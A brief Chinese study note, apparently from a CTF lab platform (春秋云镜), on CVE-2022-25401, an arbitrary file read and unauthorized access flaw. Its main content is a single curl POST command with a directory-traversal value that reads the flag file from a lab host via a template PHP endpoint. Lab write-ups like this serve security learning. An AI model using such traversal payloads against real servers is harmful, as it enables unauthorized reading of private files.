CVE-2022-25401

UID: 20240531104822
created: 2024-05-31 10:48
tags:
  - 春秋云镜
漏洞类型:
  - 任意文件读取
  - 未授权访问
dg-publish:
  - "true"

根据Poc请求 /administrator/templates/default/html/windows/right.php
2

. curl -X POST "http://eci-2zebxtc4a3cdx03gqx97.cloudeci1.ichunqiu.com/templates/default/html/windows/right.php" -d "url=../../../../../../../../../../../../flag"